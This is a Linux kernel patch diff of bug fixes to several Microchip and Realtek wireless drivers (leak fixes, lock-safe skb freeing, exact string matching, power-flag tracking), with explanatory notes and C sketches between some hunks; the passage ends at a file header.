+diff --git a/drivers/net/wireless/microchip/wilc1000/netdev.c b/drivers/net/wireless/microchip/wilc1000/netdev.c
+index 9b319a455b96d..e9f59de31b0b9 100644
+--- a/drivers/net/wireless/microchip/wilc1000/netdev.c
++++ b/drivers/net/wireless/microchip/wilc1000/netdev.c
+@@ -730,6 +730,7 @@ netdev_tx_t wilc_mac_xmit(struct sk_buff *skb, struct net_device *ndev)
+ 
+ 	if (skb->dev != ndev) {
+ 		netdev_err(ndev, "Packet not destined to this device\n");
++		dev_kfree_skb(skb);
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+@@ -980,7 +981,7 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 						    ndev->name);
+ 	if (!wl->hif_workqueue) {
+ 		ret = -ENOMEM;
+-		goto error;
++		goto unregister_netdev;
+ 	}
+ 
+ 	ndev->needs_free_netdev = true;
+@@ -995,6 +996,11 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 
+ 	return vif;
+ 
++unregister_netdev:
++	if (rtnl_locked)
++		cfg80211_unregister_netdevice(ndev);
++	else
++		unregister_netdev(ndev);
+   error:
+ 	free_netdev(ndev);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c
+index 2c4f403ba68f3..97e7ff7289fab 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c
+@@ -1122,7 +1122,7 @@ static void rtl8188fu_phy_iqcalibrate(struct rtl8xxxu_priv *priv,
+ 
+ 	if (t == 0) {
+ 		val32 = rtl8xxxu_read32(priv, REG_FPGA0_XA_HSSI_PARM1);
+-		priv->pi_enabled = val32 & FPGA0_HSSI_PARM1_PI;
++		priv->pi_enabled = u32_get_bits(val32, FPGA0_HSSI_PARM1_PI);
+ 	}
+ 
+ 	/* save RF path */
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+index a7d76693c02db..9d0ed6760cb61 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+@@ -1744,6 +1744,11 @@ static void rtl8192e_enable_rf(struct rtl8xxxu_priv *priv)
+ 	val8 = rtl8xxxu_read8(priv, REG_PAD_CTRL1);
+ 	val8 &= ~BIT(0);
+ 	rtl8xxxu_write8(priv, REG_PAD_CTRL1, val8);
++
++	/*
++	 * Fix transmission failure of rtl8192e.
++	 */
++	rtl8xxxu_write8(priv, REG_TXPAUSE, 0x00);
+ }
+ 
+ static s8 rtl8192e_cck_rssi(struct rtl8xxxu_priv *priv, u8 cck_agc_rpt)
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index 3ed435401e570..d22990464dad6 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -4208,10 +4208,12 @@ static int rtl8xxxu_init_device(struct ieee80211_hw *hw)
+ 		 * should be equal or CCK RSSI report may be incorrect
+ 		 */
+ 		val32 = rtl8xxxu_read32(priv, REG_FPGA0_XA_HSSI_PARM2);
+-		priv->cck_agc_report_type = val32 & FPGA0_HSSI_PARM2_CCK_HIGH_PWR;
++		priv->cck_agc_report_type =
++			u32_get_bits(val32, FPGA0_HSSI_PARM2_CCK_HIGH_PWR);
+ 
+ 		val32 = rtl8xxxu_read32(priv, REG_FPGA0_XB_HSSI_PARM2);
+-		if (priv->cck_agc_report_type != (bool)(val32 & FPGA0_HSSI_PARM2_CCK_HIGH_PWR)) {
++		if (priv->cck_agc_report_type !=
++		    u32_get_bits(val32, FPGA0_HSSI_PARM2_CCK_HIGH_PWR)) {
+ 			if (priv->cck_agc_report_type)
+ 				val32 |= FPGA0_HSSI_PARM2_CCK_HIGH_PWR;
+ 			else
+@@ -5274,7 +5276,7 @@ static void rtl8xxxu_queue_rx_urb(struct rtl8xxxu_priv *priv,
+ 		pending = priv->rx_urb_pending_count;
+ 	} else {
+ 		skb = (struct sk_buff *)rx_urb->urb.context;
+-		dev_kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		usb_free_urb(&rx_urb->urb);
+ 	}
+ 
+@@ -5550,9 +5552,6 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 	btcoex = &priv->bt_coex;
+ 	rarpt = &priv->ra_report;
+ 
+-	if (priv->rf_paths > 1)
+-		goto out;
+-
+ 	while (!skb_queue_empty(&priv->c2hcmd_queue)) {
+ 		skb = skb_dequeue(&priv->c2hcmd_queue);
+ 
+@@ -5585,10 +5584,9 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 		default:
+ 			break;
+ 		}
+-	}
+ 
+-out:
+-	dev_kfree_skb(skb);
++		dev_kfree_skb(skb);
++	}
+ }
+ 
+ static void rtl8723bu_handle_c2h(struct rtl8xxxu_priv *priv,
+@@ -5956,7 +5954,6 @@ static int rtl8xxxu_config(struct ieee80211_hw *hw, u32 changed)
+ {
+ 	struct rtl8xxxu_priv *priv = hw->priv;
+ 	struct device *dev = &priv->udev->dev;
+-	u16 val16;
+ 	int ret = 0, channel;
+ 	bool ht40;
+ 
+@@ -5966,14 +5963,6 @@ static int rtl8xxxu_config(struct ieee80211_hw *hw, u32 changed)
+ 			 __func__, hw->conf.chandef.chan->hw_value,
+ 			 changed, hw->conf.chandef.width);
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_RETRY_LIMITS) {
+-		val16 = ((hw->conf.long_frame_max_tx_count <<
+-			  RETRY_LIMIT_LONG_SHIFT) & RETRY_LIMIT_LONG_MASK) |
+-			((hw->conf.short_frame_max_tx_count <<
+-			  RETRY_LIMIT_SHORT_SHIFT) & RETRY_LIMIT_SHORT_MASK);
+-		rtl8xxxu_write16(priv, REG_RETRY_LIMIT, val16);
+-	}
+-
+ 	if (changed & IEEE80211_CONF_CHANGE_CHANNEL) {
+ 		switch (hw->conf.chandef.width) {
+ 		case NL80211_CHAN_WIDTH_20_NOHT:
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
+index 58c2ab3d44bef..de61c9c0ddec4 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
+@@ -68,8 +68,10 @@ static void _rtl88ee_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -79,10 +81,12 @@ static void _rtl88ee_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl88ee_disable_bcn_sub_func(struct ieee80211_hw *hw)
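
[Note on the idiom] This hunk and the two matching rtlwifi hunks below (rtl8723be, rtl8821ae) all apply the same transformation: instead of calling kfree_skb() while holding an IRQ-disabling spinlock, the skbs are moved onto a local sk_buff_head under the lock and purged after it is dropped. Compared with the dev_kfree_skb_irq() approach used earlier in this patch, this keeps the critical section short and frees the memory immediately once the lock is released. A kernel-style sketch, assuming hypothetical struct my_ring and ring_pop() helpers:

    /* Kernel-style sketch, not a standalone program. */
    #include <linux/skbuff.h>
    #include <linux/spinlock.h>

    struct my_ring;
    struct sk_buff *ring_pop(struct my_ring *ring);  /* hypothetical */

    static void return_queue_skbs(spinlock_t *lock, struct my_ring *ring)
    {
        struct sk_buff_head free_list;
        struct sk_buff *skb;
        unsigned long flags;

        skb_queue_head_init(&free_list);

        spin_lock_irqsave(lock, flags);
        while ((skb = ring_pop(ring)) != NULL)
            __skb_queue_tail(&free_list, skb);   /* defer the free */
        spin_unlock_irqrestore(lock, flags);

        __skb_queue_purge(&free_list);           /* IRQs enabled again */
    }
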
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
+index 189cc6437600f..0ba3bbed6ed36 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
+@@ -30,8 +30,10 @@ static void _rtl8723be_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -41,10 +43,12 @@ static void _rtl8723be_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl8723be_set_bcn_ctrl_reg(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
+index 7e0f62d59fe17..a7e3250957dc9 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
+@@ -26,8 +26,10 @@ static void _rtl8821ae_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -37,10 +39,12 @@ static void _rtl8821ae_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl8821ae_set_bcn_ctrl_reg(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+index a29321e2fa72f..5323ead30db03 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+@@ -1598,18 +1598,6 @@ static bool _rtl8812ae_get_integer_from_string(const char *str, u8 *pint)
+ 	return true;
+ }
+ 
+-static bool _rtl8812ae_eq_n_byte(const char *str1, const char *str2, u32 num)
+-{
+-	if (num == 0)
+-		return false;
+-	while (num > 0) {
+-		num--;
+-		if (str1[num] != str2[num])
+-			return false;
+-	}
+-	return true;
+-}
+-
+ static s8 _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(struct ieee80211_hw *hw,
+ 					      u8 band, u8 channel)
+ {
+@@ -1659,42 +1647,42 @@ static void _rtl8812ae_phy_set_txpower_limit(struct ieee80211_hw *hw,
+ 	power_limit = power_limit > MAX_POWER_INDEX ?
+ 		      MAX_POWER_INDEX : power_limit;
+ 
+-	if (_rtl8812ae_eq_n_byte(pregulation, "FCC", 3))
++	if (strcmp(pregulation, "FCC") == 0)
+ 		regulation = 0;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "MKK", 3))
++	else if (strcmp(pregulation, "MKK") == 0)
+ 		regulation = 1;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "ETSI", 4))
++	else if (strcmp(pregulation, "ETSI") == 0)
+ 		regulation = 2;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "WW13", 4))
++	else if (strcmp(pregulation, "WW13") == 0)
+ 		regulation = 3;
+ 
+-	if (_rtl8812ae_eq_n_byte(prate_section, "CCK", 3))
++	if (strcmp(prate_section, "CCK") == 0)
+ 		rate_section = 0;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "OFDM", 4))
++	else if (strcmp(prate_section, "OFDM") == 0)
+ 		rate_section = 1;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "HT", 2) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "1T", 2))
++	else if (strcmp(prate_section, "HT") == 0 &&
++		 strcmp(prf_path, "1T") == 0)
+ 		rate_section = 2;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "HT", 2) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "2T", 2))
++	else if (strcmp(prate_section, "HT") == 0 &&
++		 strcmp(prf_path, "2T") == 0)
+ 		rate_section = 3;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "VHT", 3) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "1T", 2))
++	else if (strcmp(prate_section, "VHT") == 0 &&
++		 strcmp(prf_path, "1T") == 0)
+ 		rate_section = 4;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "VHT", 3) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "2T", 2))
++	else if (strcmp(prate_section, "VHT") == 0 &&
++		 strcmp(prf_path, "2T") == 0)
+ 		rate_section = 5;
+ 
+-	if (_rtl8812ae_eq_n_byte(pbandwidth, "20M", 3))
++	if (strcmp(pbandwidth, "20M") == 0)
+ 		bandwidth = 0;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "40M", 3))
++	else if (strcmp(pbandwidth, "40M") == 0)
+ 		bandwidth = 1;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "80M", 3))
++	else if (strcmp(pbandwidth, "80M") == 0)
+ 		bandwidth = 2;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "160M", 4))
++	else if (strcmp(pbandwidth, "160M") == 0)
+ 		bandwidth = 3;
+ 
+-	if (_rtl8812ae_eq_n_byte(pband, "2.4G", 4)) {
++	if (strcmp(pband, "2.4G") == 0) {
+ 		ret = _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(hw,
+ 							       BAND_ON_2_4G,
+ 							       channel);
+@@ -1718,7 +1706,7 @@ static void _rtl8812ae_phy_set_txpower_limit(struct ieee80211_hw *hw,
+ 			regulation, bandwidth, rate_section, channel_index,
+ 			rtlphy->txpwr_limit_2_4g[regulation][bandwidth]
+ 				[rate_section][channel_index][RF90_PATH_A]);
+-	} else if (_rtl8812ae_eq_n_byte(pband, "5G", 2)) {
++	} else if (strcmp(pband, "5G") == 0) {
+ 		ret = _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(hw,
+ 							       BAND_ON_5G,
+ 							       channel);
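
[Note on the idiom] The rtl8821ae/phy.c hunk above drops the hand-rolled _rtl8812ae_eq_n_byte() in favour of strcmp(). The old helper compared only the first num bytes, i.e. it was a prefix match, so a longer token sharing a prefix with a keyword would have matched it; strcmp() requires the strings to match exactly through the terminator. A self-contained comparison:

    #include <stdio.h>
    #include <string.h>

    /* The removed helper, reproduced for comparison: a prefix match. */
    static int eq_n_byte(const char *s1, const char *s2, unsigned int num)
    {
        if (num == 0)
            return 0;
        while (num > 0) {
            num--;
            if (s1[num] != s2[num])
                return 0;
        }
        return 1;
    }

    int main(void)
    {
        printf("eq_n_byte(\"HT40\", \"HT\", 2) = %d\n",
               eq_n_byte("HT40", "HT", 2));   /* 1: spurious match */
        printf("strcmp(\"HT40\", \"HT\") == 0 -> %d\n",
               strcmp("HT40", "HT") == 0);    /* 0: exact match only */
        return 0;
    }
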
+diff --git a/drivers/net/wireless/realtek/rtw88/coex.c b/drivers/net/wireless/realtek/rtw88/coex.c
+index 38697237ee5f0..86467d2f8888c 100644
+--- a/drivers/net/wireless/realtek/rtw88/coex.c
++++ b/drivers/net/wireless/realtek/rtw88/coex.c
+@@ -4056,7 +4056,7 @@ void rtw_coex_display_coex_info(struct rtw_dev *rtwdev, struct seq_file *m)
+ 		   rtwdev->stats.tx_throughput, rtwdev->stats.rx_throughput);
+ 	seq_printf(m, "%-40s = %u/ %u/ %u\n",
+ 		   "IPS/ Low Power/ PS mode",
+-		   test_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags),
++		   !test_bit(RTW_FLAG_POWERON, rtwdev->flags),
+ 		   test_bit(RTW_FLAG_LEISURE_PS_DEEP, rtwdev->flags),
+ 		   rtwdev->lps_conf.mode);
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/mac.c b/drivers/net/wireless/realtek/rtw88/mac.c
+index 98777f294945f..aa7c5901ef260 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac.c
++++ b/drivers/net/wireless/realtek/rtw88/mac.c
+@@ -273,6 +273,11 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 	if (rtw_pwr_seq_parser(rtwdev, pwr_seq))
+ 		return -EINVAL;
+ 
++	if (pwr_on)
++		set_bit(RTW_FLAG_POWERON, rtwdev->flags);
++	else
++		clear_bit(RTW_FLAG_POWERON, rtwdev->flags);
++
+ 	return 0;
+ }
+ 
+@@ -335,6 +340,11 @@ int rtw_mac_power_on(struct rtw_dev *rtwdev)
+ 	ret = rtw_mac_power_switch(rtwdev, true);
+ 	if (ret == -EALREADY) {
+ 		rtw_mac_power_switch(rtwdev, false);
++
++		ret = rtw_mac_pre_system_cfg(rtwdev);
++		if (ret)
++			goto err;
++
+ 		ret = rtw_mac_power_switch(rtwdev, true);
+ 		if (ret)
+ 			goto err;
+diff --git a/drivers/net/wireless/realtek/rtw88/mac80211.c b/drivers/net/wireless/realtek/rtw88/mac80211.c
+index 776a9a9884b5d..3b92ac611d3fd 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw88/mac80211.c
+@@ -737,7 +737,7 @@ static void rtw_ra_mask_info_update(struct rtw_dev *rtwdev,
+ 	br_data.rtwdev = rtwdev;
+ 	br_data.vif = vif;
+ 	br_data.mask = mask;
+-	rtw_iterate_stas_atomic(rtwdev, rtw_ra_mask_info_update_iter, &br_data);
++	rtw_iterate_stas(rtwdev, rtw_ra_mask_info_update_iter, &br_data);
+ }
+ 
+ static int rtw_ops_set_bitrate_mask(struct ieee80211_hw *hw,
+@@ -746,7 +746,9 @@ static int rtw_ops_set_bitrate_mask(struct ieee80211_hw *hw,
+ {
+ 	struct rtw_dev *rtwdev = hw->priv;
+ 
++	mutex_lock(&rtwdev->mutex);
+ 	rtw_ra_mask_info_update(rtwdev, vif, mask);
++	mutex_unlock(&rtwdev->mutex);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/wireless/realtek/rtw88/main.c b/drivers/net/wireless/realtek/rtw88/main.c
+index 888427cf3bdf9..b2e78737bd5d0 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.c
++++ b/drivers/net/wireless/realtek/rtw88/main.c
+@@ -241,8 +241,10 @@ static void rtw_watch_dog_work(struct work_struct *work)
+ 	rtw_phy_dynamic_mechanism(rtwdev);
+ 
+ 	data.rtwdev = rtwdev;
+-	/* use atomic version to avoid taking local->iflist_mtx mutex */
+-	rtw_iterate_vifs_atomic(rtwdev, rtw_vif_watch_dog_iter, &data);
++	/* rtw_iterate_vifs internally uses an atomic iterator which is needed
++	 * to avoid taking local->iflist_mtx mutex
++	 */
++	rtw_iterate_vifs(rtwdev, rtw_vif_watch_dog_iter, &data);
+ 
+ 	/* fw supports only one station associated to enter lps, if there are
+ 	 * more than two stations associated to the AP, then we can not enter
+diff --git a/drivers/net/wireless/realtek/rtw88/main.h b/drivers/net/wireless/realtek/rtw88/main.h
+index 165f299e8e1f9..d4a53d5567451 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.h
++++ b/drivers/net/wireless/realtek/rtw88/main.h
+@@ -356,7 +356,7 @@ enum rtw_flags {
+ 	RTW_FLAG_RUNNING,
+ 	RTW_FLAG_FW_RUNNING,
+ 	RTW_FLAG_SCANNING,
+-	RTW_FLAG_INACTIVE_PS,
++	RTW_FLAG_POWERON,
+ 	RTW_FLAG_LEISURE_PS,
+ 	RTW_FLAG_LEISURE_PS_DEEP,
+ 	RTW_FLAG_DIG_DISABLE,
+diff --git a/drivers/net/wireless/realtek/rtw88/ps.c b/drivers/net/wireless/realtek/rtw88/ps.c
+index 11594940d6b00..996365575f44f 100644
+--- a/drivers/net/wireless/realtek/rtw88/ps.c
++++ b/drivers/net/wireless/realtek/rtw88/ps.c
+@@ -25,7 +25,7 @@ static int rtw_ips_pwr_up(struct rtw_dev *rtwdev)
+ 
+ int rtw_enter_ips(struct rtw_dev *rtwdev)
+ {
+-	if (test_and_set_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags))
++	if (!test_bit(RTW_FLAG_POWERON, rtwdev->flags))
+ 		return 0;
+ 
+ 	rtw_coex_ips_notify(rtwdev, COEX_IPS_ENTER);
+@@ -50,7 +50,7 @@ int rtw_leave_ips(struct rtw_dev *rtwdev)
+ {
+ 	int ret;
+ 
+-	if (!test_and_clear_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags))
++	if (test_bit(RTW_FLAG_POWERON, rtwdev->flags))
+ 		return 0;
+ 
+ 	rtw_hci_link_ps(rtwdev, false);
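
[Note: the rename from RTW_FLAG_INACTIVE_PS to RTW_FLAG_POWERON inverts the flag's meaning: rather than remembering "we entered IPS", the driver now tracks the real power state, so enter/leave become no-ops when the hardware is already where it should be. A compact sketch of the inverted-flag logic; the real driver flips the bit inside rtw_mac_power_switch(), the sketch folds it into enter/leave for brevity.]

#include <stdbool.h>
#include <stdio.h>

static bool poweron;		/* mirrors RTW_FLAG_POWERON */

static int enter_ips(void)
{
	if (!poweron)		/* already powered off: nothing to do */
		return 0;
	poweron = false;	/* power down */
	return 0;
}

static int leave_ips(void)
{
	if (poweron)		/* already powered on: nothing to do */
		return 0;
	poweron = true;		/* power up */
	return 0;
}

int main(void)
{
	poweron = true;
	enter_ips();
	leave_ips();
	printf("poweron=%d\n", poweron);
	return 0;
}
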
+diff --git a/drivers/net/wireless/realtek/rtw88/wow.c b/drivers/net/wireless/realtek/rtw88/wow.c
+index 89dc595094d5c..16ddee577efec 100644
+--- a/drivers/net/wireless/realtek/rtw88/wow.c
++++ b/drivers/net/wireless/realtek/rtw88/wow.c
+@@ -592,7 +592,7 @@ static int rtw_wow_leave_no_link_ps(struct rtw_dev *rtwdev)
+ 		if (rtw_get_lps_deep_mode(rtwdev) != LPS_DEEP_MODE_NONE)
+ 			rtw_leave_lps_deep(rtwdev);
+ 	} else {
+-		if (test_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags)) {
++		if (!test_bit(RTW_FLAG_POWERON, rtwdev->flags)) {
+ 			rtw_wow->ips_enabled = true;
+ 			ret = rtw_leave_ips(rtwdev);
+ 			if (ret)
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index 931aff8b5dc95..e99eccf11c762 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -3124,6 +3124,8 @@ int rtw89_core_init(struct rtw89_dev *rtwdev)
+ 	INIT_DELAYED_WORK(&rtwdev->cfo_track_work, rtw89_phy_cfo_track_work);
+ 	INIT_DELAYED_WORK(&rtwdev->forbid_ba_work, rtw89_forbid_ba_work);
+ 	rtwdev->txq_wq = alloc_workqueue("rtw89_tx_wq", WQ_UNBOUND | WQ_HIGHPRI, 0);
++	if (!rtwdev->txq_wq)
++		return -ENOMEM;
+ 	spin_lock_init(&rtwdev->ba_lock);
+ 	spin_lock_init(&rtwdev->rpwm_lock);
+ 	mutex_init(&rtwdev->mutex);
+@@ -3149,6 +3151,7 @@ int rtw89_core_init(struct rtw89_dev *rtwdev)
+ 	ret = rtw89_load_firmware(rtwdev);
+ 	if (ret) {
+ 		rtw89_warn(rtwdev, "no firmware loaded\n");
++		destroy_workqueue(rtwdev->txq_wq);
+ 		return ret;
+ 	}
+ 	rtw89_ser_init(rtwdev);
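
[Note: two fixes in one hunk: alloc_workqueue() is now checked for NULL, and the firmware-load error path destroys the queue so the early return no longer leaks it. A userspace analog of the pattern, with malloc/free standing in for alloc_workqueue/destroy_workqueue.]

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

static int load_firmware(void) { return -ENOENT; }	/* simulated failure */

static int core_init(void **txq_wq)
{
	int ret;

	*txq_wq = malloc(64);		/* alloc_workqueue() analog */
	if (!*txq_wq)
		return -ENOMEM;		/* the new NULL check */

	ret = load_firmware();
	if (ret) {
		free(*txq_wq);		/* the new cleanup on the error path */
		*txq_wq = NULL;
		return ret;
	}
	return 0;
}

int main(void)
{
	void *wq;

	printf("core_init -> %d\n", core_init(&wq));
	return 0;
}
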
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index 8297e35bfa52b..6730eea930ece 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -615,6 +615,7 @@ rtw89_debug_priv_mac_reg_dump_select(struct file *filp,
+ 	struct seq_file *m = (struct seq_file *)filp->private_data;
+ 	struct rtw89_debugfs_priv *debugfs_priv = m->private;
+ 	struct rtw89_dev *rtwdev = debugfs_priv->rtwdev;
++	const struct rtw89_chip_info *chip = rtwdev->chip;
+ 	char buf[32];
+ 	size_t buf_size;
+ 	int sel;
+@@ -634,6 +635,12 @@ rtw89_debug_priv_mac_reg_dump_select(struct file *filp,
+ 		return -EINVAL;
+ 	}
+ 
++	if (sel == RTW89_DBG_SEL_MAC_30 && chip->chip_id != RTL8852C) {
++		rtw89_info(rtwdev, "sel %d is address hole on chip %d\n", sel,
++			   chip->chip_id);
++		return -EINVAL;
++	}
++
+ 	debugfs_priv->cb_data = sel;
+ 	rtw89_info(rtwdev, "select mac page dump %d\n", debugfs_priv->cb_data);
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/fw.c b/drivers/net/wireless/realtek/rtw89/fw.c
+index de1f23779fc62..3b7af8faca505 100644
+--- a/drivers/net/wireless/realtek/rtw89/fw.c
++++ b/drivers/net/wireless/realtek/rtw89/fw.c
+@@ -2665,8 +2665,10 @@ static int rtw89_append_probe_req_ie(struct rtw89_dev *rtwdev,
+ 
+ 		list_add_tail(&info->list, &scan_info->pkt_list[band]);
+ 		ret = rtw89_fw_h2c_add_pkt_offload(rtwdev, &info->id, new);
+-		if (ret)
++		if (ret) {
++			kfree_skb(new);
+ 			goto out;
++		}
+ 
+ 		kfree_skb(new);
+ 	}
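
[Note: before this hunk a failing rtw89_fw_h2c_add_pkt_offload() jumped to the exit label without freeing the cloned skb; the fix frees it on the error branch as well as on success. A minimal sketch of the free-on-both-paths rule, with plain malloc in place of skb handling.]

#include <errno.h>
#include <stdlib.h>

static int offload_pkt(void *pkt) { (void)pkt; return -EIO; }	/* simulated failure */

static int append_probe_req(void)
{
	void *new = malloc(128);	/* skb copy analog */
	int ret;

	if (!new)
		return -ENOMEM;

	ret = offload_pkt(new);
	if (ret) {
		free(new);		/* the added error-path free */
		return ret;
	}

	free(new);			/* pre-existing success-path free */
	return 0;
}

int main(void) { return append_probe_req() ? 1 : 0; }
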
+diff --git a/drivers/net/wireless/realtek/rtw89/fw.h b/drivers/net/wireless/realtek/rtw89/fw.h
+index 4d2f9ea9e0022..2e4ca1cc5cae9 100644
+--- a/drivers/net/wireless/realtek/rtw89/fw.h
++++ b/drivers/net/wireless/realtek/rtw89/fw.h
